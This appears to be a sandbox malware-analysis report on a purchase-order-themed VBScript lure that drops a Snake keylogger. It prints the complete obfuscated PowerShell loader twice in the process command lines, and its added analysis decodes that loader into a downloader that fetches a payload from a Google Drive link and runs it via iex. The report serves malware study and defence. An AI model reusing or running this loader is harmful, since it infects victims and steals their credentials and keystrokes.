File name:

CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs

Full analysis: https://app.any.run/tasks/593bd2f0-76a4-4bff-9244-be7456a130cf
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: October 30, 2024, 10:55:32
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
evasion
snake
keylogger
telegram
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

375D1F996700A161DD834355BE96AF7D

SHA1:

A0ECD96D8F4964204C1FA2FE27E7ACE733721735

SHA256:

7716A52936C2096E3C7E6E1A0157D297322EC72EE6E974C7446C3147480A0B69

SSDEEP:

6144:En64ik47Q3WAFLOgL6hPnAIjxnH7sjS3xcrl0ZIRN2XrwozRMeqzAv+qmXpiEcI5:ZgcgL8jD/wGmzcspqgOwY0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 6692)
    • Accesses WMI object, sets custom ImpersonationLevel (SCRIPT)

      • wscript.exe (PID: 6692)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6692)
  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 6044)
    • The process uses the downloaded file

      • wscript.exe (PID: 6692)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
137
Monitored processes
8
Malicious processes
0
Suspicious processes
1

Behavior graph

start
wscript.exe (no specs)
powershell.exe
conhost.exe (no specs)
powershell.exe (no specs)
conhost.exe (no specs)
sppextcomobj.exe (no specs)
slui.exe (no specs)
msiexec.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 1168
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 1576
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5220"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Destilleringers Aadselbillens Optrkkene Chammy Insightfully Spadserede Reinterrogated #>;$Treaarsdages='Raylessness62';<#Kainsi Extendible Prestigiation #>; function Lerholdighedens($Rkeenglerne){If ($host.DebuggerEnabled) {$Supercandidness++;}$Kvikslvets=$Uger+$Rkeenglerne.'Length'-$Supercandidness; for ( $Plowback=5;$Plowback -lt $Kvikslvets;$Plowback+=6){$Atomsprngningernes=$Plowback;$Notationsform+=$Rkeenglerne[$Plowback];$Basidiospore='Blousily';}$Notationsform;}function Degeneroos($Battet){ . ($Vagttjeneste) ($Battet);}$Desolate=Lerholdighedens 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver ';$Rdehavssejladser=Lerholdighedens 'Un onTCemenlantips Dik 1 ordr2Rekap ';$Elektrolyt36='Exhor[Sn ppnCom.eEModert M.di.Cypris PseueDestirPartivL labiMultiC mpasEVadefPTironODommeIDashiNDownrTbrabrMSteg.A Yu,lN oungAUndergS ltmeSpunsrColto] Docu:,lank:PseudsPinlieOvatoCAlbiruEn anrCordii ya stR arwyLeve,pBenefrChri,oOverstSq.arOUc erCCognoO unrilFirew=assiz$SubmiRKapped Skvae prithSelvea MorsVM.liesTransSTmr reMamaljBjergL LuxeaIn erdbrneps KompeSummeRS mme ';$Desolate+=Lerholdighedens 'Virks5Cart .luci.0Tyran Agla(Sc,igW hopiHalvtnBrummdGodowo KonewOverpsBanan ArbitNStbniTPrepl Bryde1 Rhe.0Kelse.Kimon0Nonch;Rok.e FladeW Ba liHeartnPolyn6stamf4Dyreh;Tedes SyncxIndlu6.nued4Hoved;Styrt MerkarFemrevSemap:Aften1Taare3Takke1Udmel.Svmm 0Ajiva)Mekan GymnaG rifteUni.fcTelesk veroVrdif/maler2Ferma0Ndtvu1Junc 0Kamer0 .luf1She p0Grif 1Inte, A tomF driei .nverFor ge TjrefKvilioFormax Rein/Lrred1vidne3Domin1Barse.Fu le0A.geb ';$Lucifer=Lerholdighedens 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd ';$Deactivate=Lerholdighedens 'unwash V sttbar.etb.ostpHarr,sRi.ks:Dyreb/ Fase/Akvard eforrMakroiConcav AdsceFog d.Skralg irloHipbuochylog aurl pseue D cl.TelfocFl ckohepa mTraad/Hedg.uZ phic hori?AflokeSuprax R gspUpl,fo aktfrForhatSh ma=Irre,dParamoTe eawSkr inTremplBetaloSvegeaSamand 
Tart&Fle.siIndkrdoxidi=Under1MaquigTubbeQ wilk6Negat4HieraS Fosf- LataqAndenJTe ef4Retar-InferQLandsi Skufquns p0FrsteITriko7polypeSting_Lass jAromaxUdsprOS.even ,oveDA.pluw No.flHov d4Ci ke5a tinuTwe v5Sympa9Usm dfFa sabForsi ';$Unrecoded=Lerholdighedens 'Pause>Pneum ';$Vagttjeneste=Lerholdighedens ' SpheIOveraeLngsexA.hvl ';$Dyrkere='Coiffures';$Ligges235='\romtoddyens.Sde';Degeneroos (Lerholdighedens 'Skriv$ Pat gUnderLPetroO BrinbKraftANonatl eret:Bl ckpLovo.lEgo,eAS.ittt PalaEAuspiAMaliu7Be,ar3Skalp=impri$RisikESyntrnScal VCykel:PetheAFarenpKortaPpa orDfdeafA kaalt Kns A Capa+ Unma$GrundlRe koIS ndbGBugtagFl,tfEBrevssDorse2S opf3Kapa,5Per.p ');Degeneroos (Lerholdighedens 'Iller$ Sy bgNo,coLTinneOOrdstBIndsnaUntroLTab d:CabbafAsyljlAnbraOSarinT Leg aIn igT,nrovi Ox.toEnedeNSubcrsKumis=Isobo$NoserDUlyk eoveraAYounecAma,iTFem,riH lskvDet.raCar,etTracheDebar.inscasBon.hPProgrlAfregIRabbiTSk.lo( airm$W.ichUKe son HavaRFortre Y.erCUnsupOIndtaDSammeEHaantdTings) Prea ');Degeneroos (Lerholdighedens $Elektrolyt36);$Deactivate=$Flotations[0];$microsomatous=(Lerholdighedens 'unpai$SoddegRibblL,eashOEnevaBP euda AnstLApok.:Disi.cembryuDaintdPlai D B anY,atun6 Auto0Elbil= Un,pNSheepEMedieWGa,ss-LkkesoGalejbCi cuJ luetETruthCSacc tB len ExfigsTu.tayDissesUan eTUndise BrndmLydi .EnmotnUnhooEB staTMacro.MurkiWMaaneeSulphbGanglChypsiL,abelicasteE immuNgalopTYa er ');Degeneroos ($microsomatous);Degeneroos (Lerholdighedens 'Infil$YamanCChewiu PunkdSyne d CarvyWegen6 jems0slack.IntegH Sonne IngeaApplidOprejeSlutsrAfte.sSuper[ rogr$GemmaLRef.auWearic SideiReallfPolyseFragmrbevae]Honor=Monoi$AutomDtr aseK,rtesPdag.o Unrel PrydaFyrtatAlmaneMatam ');$Untheatrically=Lerholdighedens 'f rsv$ Fi zCOrtopuSimild ResidEro.iyBul a6Fo,an0Bagma. 
BiorD agskoalcalw Kvutn S thlFusioo DattaArb.sdTrijuFkr meiArbejlAm ereDecon( Stat$RecopDSagfreBifala UdkocbellitFre uiTendevkalm.asparttop rieZoocu, Boon$ TastRGoldheSecond UnunoNegridsirenoC,lcai Funen ZoangKv li)Trans ';$Redodoing=$Platea73;Degeneroos (Lerholdighedens 'Leafw$ KvasGN tvilAnmieoAllegbCoadjA CotyLGalap:Apothk .ulbABeediNantilnTaksteProtevSottiAkomfosT.agtE FissrBeton=Sygep( Solst Hy rESidseSGenn tStivf- Tystp omniaMahont ammeHProfe Bayad$ B,hvr U taeBambuDherkiocarb.dAzureoKobolI Emb,NChimaGTital) Stil ');while (!$Kannevaser) {Degeneroos (Lerholdighedens ' Pseu$EspongGlamol verroBombib rejea Mousl ludg: AntoACharakPeractKlyv i uvago SteenAntidsMiljvaSanserFighttFauldeMistnrD agr= dema$vgtedt DairrTransuYannieKilim ') ;Degeneroos $Untheatrically;Degeneroos (Lerholdighedens 'Bajons VagaTEner AAttilrA dabT Pib -EtherS anklL HejsE ampeTritipBille Co,si4Hemo ');Degeneroos (Lerholdighedens 'Sta u$ uxeGCte,iLCursooAraneb Breiac metLCaran:Finkuk SphaaPreponParchNT ansEGraphVWaageaBlindsDampsE A.hiRKimis=Turk (UdplaTStungeSnoolS Nonatkrepl-UnproPPrejuAStreet KlumHaktiv Dyds,$JipijrStirpesovemDR asaoAcknodFactuOAu usIWomannKidn g Snor)klkes ') ;Degeneroos (Lerholdighedens ' olys$ sar,GPyj mlCarano PrinbI.dloa DefelFletd:circuLNecroY Vresmpa,abP SemiHSoa iOLarciePawmodRrligE EmanmEfterASweat=Omsp $Budgeg.eddel TopkoSa orBDyrekaSk,evlN the:GdninfGav eOsknherTertiyDe erNTrykfGSkavgeInforL BestS F ekE VaabS ntigK .nfouSkinlrPelobe f ldn SkndS gods+Tur u+No.fa%Miss.$ emmef BlaklBumseO FolktBl.ndaVolaiTB,dniIHawokOSlowmn ubnuSTouri. 
D slC BotooAdderU svr n BumptZonel ') ;$Deactivate=$Flotations[$Lymphoedema];}$Calluses=291313;$Wranny=32061;Degeneroos (Lerholdighedens ' Tran$StoppG hestl Nonto efilbCauloAGenfol Imit:Strabs BrosTJemezU Dk inSulpht P rpEMor.ld Tvi Unexp=Re,se Premg anareTunnetPrein- adiCoprikOReprsn artnT,pidoemarxiN UninTd.sod Uvede$Ov.rnr SmldeTrigodIncunoEn arDDu,lxoSommeiOps.eNNavelG Unen ');Degeneroos (Lerholdighedens 'Rgsk,$ Lnd gMortelGushioEhta bTerniaPreaul In.i:AbelmPQuintrStilkeBankkd KatoeSpiratAcipeaLattiiKulisnCount Hyper=Br,pl Unil[StrawSKonkuyTrv es RelitPa tee LnnomAflur. Pox.C InexoS awenJewe vTilf e Ci crGearvtSu.fl]Vokse:xerop: DiamFRy rarHypnooEm edm ForpB udlaaA orts JackeManag6Indma4SkaldSF.rgat prykrDr.ssiRadion.alongMor i(Baand$RecurSOverctSk bsuCountnOverft S rueRemi.dnbbed)Intor ');Degeneroos (Lerholdighedens ' Addl$Di,xigMjaveLEsse.oInd eb,nfanAUncatL Rock:TawieSPlanlt DesurTa.geaMultinTele GDukk,uOveroL Su.eaFdevatSkovliPapmeOLiljeNValutS Cosm Bevog=Unus. Ideli[Kirk SN whaY rotosD dupT E ide Enedm Toxi. UnfrtVisa eL stiX ivsmT Skrm.Forfle rotonCl iscNitrooCanelD AloeiSumpsnSv.nggBille]Chlor: Taks:.resaA.eknoS VrisCKickiI kspeITe,ti. hromg Re,eeSkrivt Hea,SHovedtYdernR reoliKopimNUnre gAks,l(re um$HyperP TranRSikkeEHymnid BiocEReev T StikAFingeI Na,rN Bal,)frott ');Degeneroos (Lerholdighedens 'slhun$UdsulGLiterLTinnioEvocaBIntima Ban LAnnso:CoupsTTepida M.rrF rnaFgaranEFyr nlIndigbIma iJPektieL cetR InvogPartie SendSAstro= Lazu$ ,enhSIsostT OutfrOverwaUp.icNAndelGSublaUOparblTap lASkanntFerruifrdseOProteN.ectoSTek,t.BossaSenevou Enh BE sposunbartBivirRspejdi inibN Ce,hgforre(Forsk$AugusCprevaaJul kLKalkvlDe rouSmircsKn breBod sSRekor,Hypni$ etroW PapiRcapmaaFakeyn ,mbenhov,dYMaski) Rkeh ');Degeneroos $Taffelbjerges;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5952
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6044"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Destilleringers Aadselbillens Optrkkene Chammy Insightfully Spadserede Reinterrogated #>;$Treaarsdages='Raylessness62';<#Kainsi Extendible Prestigiation #>; function Lerholdighedens($Rkeenglerne){If ($host.DebuggerEnabled) {$Supercandidness++;}$Kvikslvets=$Uger+$Rkeenglerne.'Length'-$Supercandidness; for ( $Plowback=5;$Plowback -lt $Kvikslvets;$Plowback+=6){$Atomsprngningernes=$Plowback;$Notationsform+=$Rkeenglerne[$Plowback];$Basidiospore='Blousily';}$Notationsform;}function Degeneroos($Battet){ . ($Vagttjeneste) ($Battet);}$Desolate=Lerholdighedens 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver ';$Rdehavssejladser=Lerholdighedens 'Un onTCemenlantips Dik 1 ordr2Rekap ';$Elektrolyt36='Exhor[Sn ppnCom.eEModert M.di.Cypris PseueDestirPartivL labiMultiC mpasEVadefPTironODommeIDashiNDownrTbrabrMSteg.A Yu,lN oungAUndergS ltmeSpunsrColto] Docu:,lank:PseudsPinlieOvatoCAlbiruEn anrCordii ya stR arwyLeve,pBenefrChri,oOverstSq.arOUc erCCognoO unrilFirew=assiz$SubmiRKapped Skvae prithSelvea MorsVM.liesTransSTmr reMamaljBjergL LuxeaIn erdbrneps KompeSummeRS mme ';$Desolate+=Lerholdighedens 'Virks5Cart .luci.0Tyran Agla(Sc,igW hopiHalvtnBrummdGodowo KonewOverpsBanan ArbitNStbniTPrepl Bryde1 Rhe.0Kelse.Kimon0Nonch;Rok.e FladeW Ba liHeartnPolyn6stamf4Dyreh;Tedes SyncxIndlu6.nued4Hoved;Styrt MerkarFemrevSemap:Aften1Taare3Takke1Udmel.Svmm 0Ajiva)Mekan GymnaG rifteUni.fcTelesk veroVrdif/maler2Ferma0Ndtvu1Junc 0Kamer0 .luf1She p0Grif 1Inte, A tomF driei .nverFor ge TjrefKvilioFormax Rein/Lrred1vidne3Domin1Barse.Fu le0A.geb ';$Lucifer=Lerholdighedens 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd ';$Deactivate=Lerholdighedens 'unwash V sttbar.etb.ostpHarr,sRi.ks:Dyreb/ Fase/Akvard eforrMakroiConcav AdsceFog d.Skralg irloHipbuochylog aurl pseue D cl.TelfocFl ckohepa mTraad/Hedg.uZ phic hori?AflokeSuprax R gspUpl,fo aktfrForhatSh ma=Irre,dParamoTe eawSkr inTremplBetaloSvegeaSamand 
Tart&Fle.siIndkrdoxidi=Under1MaquigTubbeQ wilk6Negat4HieraS Fosf- LataqAndenJTe ef4Retar-InferQLandsi Skufquns p0FrsteITriko7polypeSting_Lass jAromaxUdsprOS.even ,oveDA.pluw No.flHov d4Ci ke5a tinuTwe v5Sympa9Usm dfFa sabForsi ';$Unrecoded=Lerholdighedens 'Pause>Pneum ';$Vagttjeneste=Lerholdighedens ' SpheIOveraeLngsexA.hvl ';$Dyrkere='Coiffures';$Ligges235='\romtoddyens.Sde';Degeneroos (Lerholdighedens 'Skriv$ Pat gUnderLPetroO BrinbKraftANonatl eret:Bl ckpLovo.lEgo,eAS.ittt PalaEAuspiAMaliu7Be,ar3Skalp=impri$RisikESyntrnScal VCykel:PetheAFarenpKortaPpa orDfdeafA kaalt Kns A Capa+ Unma$GrundlRe koIS ndbGBugtagFl,tfEBrevssDorse2S opf3Kapa,5Per.p ');Degeneroos (Lerholdighedens 'Iller$ Sy bgNo,coLTinneOOrdstBIndsnaUntroLTab d:CabbafAsyljlAnbraOSarinT Leg aIn igT,nrovi Ox.toEnedeNSubcrsKumis=Isobo$NoserDUlyk eoveraAYounecAma,iTFem,riH lskvDet.raCar,etTracheDebar.inscasBon.hPProgrlAfregIRabbiTSk.lo( airm$W.ichUKe son HavaRFortre Y.erCUnsupOIndtaDSammeEHaantdTings) Prea ');Degeneroos (Lerholdighedens $Elektrolyt36);$Deactivate=$Flotations[0];$microsomatous=(Lerholdighedens 'unpai$SoddegRibblL,eashOEnevaBP euda AnstLApok.:Disi.cembryuDaintdPlai D B anY,atun6 Auto0Elbil= Un,pNSheepEMedieWGa,ss-LkkesoGalejbCi cuJ luetETruthCSacc tB len ExfigsTu.tayDissesUan eTUndise BrndmLydi .EnmotnUnhooEB staTMacro.MurkiWMaaneeSulphbGanglChypsiL,abelicasteE immuNgalopTYa er ');Degeneroos ($microsomatous);Degeneroos (Lerholdighedens 'Infil$YamanCChewiu PunkdSyne d CarvyWegen6 jems0slack.IntegH Sonne IngeaApplidOprejeSlutsrAfte.sSuper[ rogr$GemmaLRef.auWearic SideiReallfPolyseFragmrbevae]Honor=Monoi$AutomDtr aseK,rtesPdag.o Unrel PrydaFyrtatAlmaneMatam ');$Untheatrically=Lerholdighedens 'f rsv$ Fi zCOrtopuSimild ResidEro.iyBul a6Fo,an0Bagma. 
BiorD agskoalcalw Kvutn S thlFusioo DattaArb.sdTrijuFkr meiArbejlAm ereDecon( Stat$RecopDSagfreBifala UdkocbellitFre uiTendevkalm.asparttop rieZoocu, Boon$ TastRGoldheSecond UnunoNegridsirenoC,lcai Funen ZoangKv li)Trans ';$Redodoing=$Platea73;Degeneroos (Lerholdighedens 'Leafw$ KvasGN tvilAnmieoAllegbCoadjA CotyLGalap:Apothk .ulbABeediNantilnTaksteProtevSottiAkomfosT.agtE FissrBeton=Sygep( Solst Hy rESidseSGenn tStivf- Tystp omniaMahont ammeHProfe Bayad$ B,hvr U taeBambuDherkiocarb.dAzureoKobolI Emb,NChimaGTital) Stil ');while (!$Kannevaser) {Degeneroos (Lerholdighedens ' Pseu$EspongGlamol verroBombib rejea Mousl ludg: AntoACharakPeractKlyv i uvago SteenAntidsMiljvaSanserFighttFauldeMistnrD agr= dema$vgtedt DairrTransuYannieKilim ') ;Degeneroos $Untheatrically;Degeneroos (Lerholdighedens 'Bajons VagaTEner AAttilrA dabT Pib -EtherS anklL HejsE ampeTritipBille Co,si4Hemo ');Degeneroos (Lerholdighedens 'Sta u$ uxeGCte,iLCursooAraneb Breiac metLCaran:Finkuk SphaaPreponParchNT ansEGraphVWaageaBlindsDampsE A.hiRKimis=Turk (UdplaTStungeSnoolS Nonatkrepl-UnproPPrejuAStreet KlumHaktiv Dyds,$JipijrStirpesovemDR asaoAcknodFactuOAu usIWomannKidn g Snor)klkes ') ;Degeneroos (Lerholdighedens ' olys$ sar,GPyj mlCarano PrinbI.dloa DefelFletd:circuLNecroY Vresmpa,abP SemiHSoa iOLarciePawmodRrligE EmanmEfterASweat=Omsp $Budgeg.eddel TopkoSa orBDyrekaSk,evlN the:GdninfGav eOsknherTertiyDe erNTrykfGSkavgeInforL BestS F ekE VaabS ntigK .nfouSkinlrPelobe f ldn SkndS gods+Tur u+No.fa%Miss.$ emmef BlaklBumseO FolktBl.ndaVolaiTB,dniIHawokOSlowmn ubnuSTouri. 
D slC BotooAdderU svr n BumptZonel ') ;$Deactivate=$Flotations[$Lymphoedema];}$Calluses=291313;$Wranny=32061;Degeneroos (Lerholdighedens ' Tran$StoppG hestl Nonto efilbCauloAGenfol Imit:Strabs BrosTJemezU Dk inSulpht P rpEMor.ld Tvi Unexp=Re,se Premg anareTunnetPrein- adiCoprikOReprsn artnT,pidoemarxiN UninTd.sod Uvede$Ov.rnr SmldeTrigodIncunoEn arDDu,lxoSommeiOps.eNNavelG Unen ');Degeneroos (Lerholdighedens 'Rgsk,$ Lnd gMortelGushioEhta bTerniaPreaul In.i:AbelmPQuintrStilkeBankkd KatoeSpiratAcipeaLattiiKulisnCount Hyper=Br,pl Unil[StrawSKonkuyTrv es RelitPa tee LnnomAflur. Pox.C InexoS awenJewe vTilf e Ci crGearvtSu.fl]Vokse:xerop: DiamFRy rarHypnooEm edm ForpB udlaaA orts JackeManag6Indma4SkaldSF.rgat prykrDr.ssiRadion.alongMor i(Baand$RecurSOverctSk bsuCountnOverft S rueRemi.dnbbed)Intor ');Degeneroos (Lerholdighedens ' Addl$Di,xigMjaveLEsse.oInd eb,nfanAUncatL Rock:TawieSPlanlt DesurTa.geaMultinTele GDukk,uOveroL Su.eaFdevatSkovliPapmeOLiljeNValutS Cosm Bevog=Unus. Ideli[Kirk SN whaY rotosD dupT E ide Enedm Toxi. UnfrtVisa eL stiX ivsmT Skrm.Forfle rotonCl iscNitrooCanelD AloeiSumpsnSv.nggBille]Chlor: Taks:.resaA.eknoS VrisCKickiI kspeITe,ti. hromg Re,eeSkrivt Hea,SHovedtYdernR reoliKopimNUnre gAks,l(re um$HyperP TranRSikkeEHymnid BiocEReev T StikAFingeI Na,rN Bal,)frott ');Degeneroos (Lerholdighedens 'slhun$UdsulGLiterLTinnioEvocaBIntima Ban LAnnso:CoupsTTepida M.rrF rnaFgaranEFyr nlIndigbIma iJPektieL cetR InvogPartie SendSAstro= Lazu$ ,enhSIsostT OutfrOverwaUp.icNAndelGSublaUOparblTap lASkanntFerruifrdseOProteN.ectoSTek,t.BossaSenevou Enh BE sposunbartBivirRspejdi inibN Ce,hgforre(Forsk$AugusCprevaaJul kLKalkvlDe rouSmircsKn breBod sSRekor,Hypni$ etroW PapiRcapmaaFakeyn ,mbenhov,dYMaski) Rkeh ');Degeneroos $Taffelbjerges;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 6248
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
PID: 6504
CMD: "C:\WINDOWS\SysWOW64\msiexec.exe"
Path: C:\Windows\SysWOW64\msiexec.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
PID: 6692
CMD: "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\CONSTRUCTORA OBRAS PÚBLICAS SAN EMETERIO S.A ARTÍCULOS EN ORDEN DE COMPRA LISTA ADJUNTA.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
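The two powershell.exe command lines above (PIDs 5220 and 6044 carry the same script) hide every real string behind the `Lerholdighedens` function. It walks a literal from index 5 in steps of 6 and keeps only those characters, so each real character sits behind five characters of Danish-looking filler. The loop bound is the literal's length minus `$Supercandidness`, which is incremented only when `$host.DebuggerEnabled` is true; powershell.exe's console host reports true, so the final padding character is dropped, while a host that reports false leaves a stray trailing character on every decoded string (an anti-emulation check, not a debugger check). `Degeneroos` then runs each decoded string through `$Vagttjeneste`, which decodes to `Iex`. The Python below is an added example, not code from the report or the sample: it reimplements that decoder and runs it over literals copied from the command line; `decode`, `decode_assignments` and the constructed `EXCERPT` are this example's own names. One caveat before reusing it on the text of this page: the copy shown here has lost the non-ASCII characters of the padding (words such as `Kvikslvets` and `Optrkkene` are missing æ/ø/å), so longer literals decode with drifting offsets; decode from the original script for anything beyond the short literals used here.

```python
"""Re-implementation of the string decoder in this sample's PowerShell stage.
Added example; not code from the ANY.RUN report or from the sample itself.
Literals are copied from the command line of PID 5220 above."""
import re

START, STEP = 5, 6  # for ($Plowback=5; $Plowback -lt $Kvikslvets; $Plowback+=6)

# Literals copied verbatim from the command line (trailing space included).
UA_PREFIX = 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver '
TLS = 'Un onTCemenlantips Dik 1 ordr2Rekap '
HEADER = 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd '
SPLITTER = 'Pause>Pneum '
INVOKER = ' SpheIOveraeLngsexA.hvl '


def decode(literal: str, debugger_enabled: bool = True) -> str:
    """Mirror Lerholdighedens: keep literal[5], literal[11], literal[17], ...

    The loop bound is $Uger + length - $Supercandidness. $Uger is never
    assigned ($null, i.e. 0) and $Supercandidness is incremented only when
    $host.DebuggerEnabled is true. powershell.exe's console host reports
    true, so the bound is length-1 and the last padding byte is skipped; a
    host that reports false keeps it and every string gains a stray trailing
    character, which breaks the header name and the iex lookup.
    """
    bound = len(literal) - (1 if debugger_enabled else 0)
    return "".join(literal[i] for i in range(START, bound, STEP))


ASSIGN_RE = re.compile(r"\$(\w+)(\+?=)Lerholdighedens\s+'([^']*)'")


def decode_assignments(script: str, debugger_enabled: bool = True) -> dict:
    """Decode every `$name=Lerholdighedens '...'` / `+=` in a script fragment.

    Arguments passed straight to Degeneroos(...) are decoded the same way
    but are executed rather than stored, so they are out of scope here.
    """
    out: dict = {}
    for name, op, literal in ASSIGN_RE.findall(script):
        value = decode(literal, debugger_enabled)
        out[name] = out.get(name, "") + value if op == "+=" else value
    return out


# Constructed excerpt: five real assignments plus the first 24 characters of
# the second $Desolate literal, enough to show the += concatenation.
EXCERPT = (
    "$Desolate=Lerholdighedens 'BatikM TyraoSnavszNonp i Ex aldestalNitroa Haan/A,ver ';"
    "$Rdehavssejladser=Lerholdighedens 'Un onTCemenlantips Dik 1 ordr2Rekap ';"
    "$Desolate+=Lerholdighedens 'Virks5Cart .luci.0Tyran ';"
    "$Lucifer=Lerholdighedens 'Ba seuP,eems InelEAfnotRC whe-BreadAMoon gTama e Unhen f.buT S dd ';"
    "$Unrecoded=Lerholdighedens 'Pause>Pneum ';"
    "$Vagttjeneste=Lerholdighedens ' SpheIOveraeLngsexA.hvl ';"
)

if __name__ == "__main__":
    for name, value in decode_assignments(EXCERPT).items():
        print(f"{name:17} -> {value!r}")
    print("same literal, host without debugger ->", repr(decode(TLS, debugger_enabled=False)))
```

Decoded from the original script (allowing for the stripped padding characters), the rest of the command line reads as a plain downloader: the User-Agent `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0`, `[Net.ServicePointManager]::SecurityProtocol=Tls12`, a drop path of `$env:AppData` plus `\romtoddyens.Sde`, a `System.Net.WebClient` with that header, and `DownloadFile` from `https://drive.google.com/uc?export=download&id=1gQ64S-qJ4-Qiq0I7e_jxOnDwl45u59fb` (the URL string is split on `>` and rotated, with `Start-Sleep 4` between attempts, until `Test-Path` on the drop succeeds). The dropped file is then read with `Get-Content`, passed through `[System.Convert]::FromBase64String` and `[System.Text.Encoding]::ASCII.GetString`, cut with `.Substring(291313, 32061)` (`$Calluses`, `$Wranny`) and handed to `iex`. That matches the drive.google.com connection from PID 5220 and the text file romtoddyens.Sde it writes under AppData\Roaming in the Dropped files list; the msiexec.exe child (PID 6504, started with no installer argument) is where the next stage runs.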
Total events
10 567
Read events
10 567
Write events
0
Delete events
0

Modification events

